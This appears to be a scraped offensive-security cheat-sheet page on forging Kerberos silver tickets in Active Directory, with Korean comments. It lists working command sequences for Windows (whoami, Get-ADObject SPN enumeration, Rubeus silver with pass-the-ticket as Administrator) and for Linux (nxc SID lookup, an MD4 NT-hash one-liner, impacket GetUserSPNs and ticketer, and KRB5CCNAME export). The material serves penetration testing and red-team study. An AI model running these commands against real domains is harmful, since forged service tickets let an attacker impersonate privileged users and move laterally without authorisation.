Silver Tickets
Abuse
References
Last updated
# 도메인 SID 획득
whoami /user
# 사용자 NT 해시 계산
https://codebeautify.org/ntlm-hash-generator
# SPN 열거
Get-ADObject -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName | Select-Object Name, SamAccountName, ObjectClass, ServicePrincipalName
# 실버 티켓 생성
.\Rubeus.exe silver /service:cifs/ad01.contoso.com /user:Administrator /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /sid:S-1-5-21-2835490888-2107562977-246861531 /nowrap /ptt# 도메인 SID 획득
SID=$(nxc ldap '<dc-ip>' -u '<username>' -p '<password>' --get-sid | grep -i sid | awk '{print $7}' | tr -d ' ')
# 사용자 NT 해시 계산
NTLM=$(echo -n '<password>' | iconv -f UTF-8 -t UTF-16LE | openssl dgst -md4 | awk '{print $2}')
# SPN 열거
impacket-GetUserSPNs '<domain/username:password>'
# 실버 티켓 생성
impacket-ticketer -nthash $NTLM -domain-sid $SID -domain '<domain>' -spn '<spn>'
# 티켓 환경변수 등록
export KRB5CCNAME=Administrator.ccache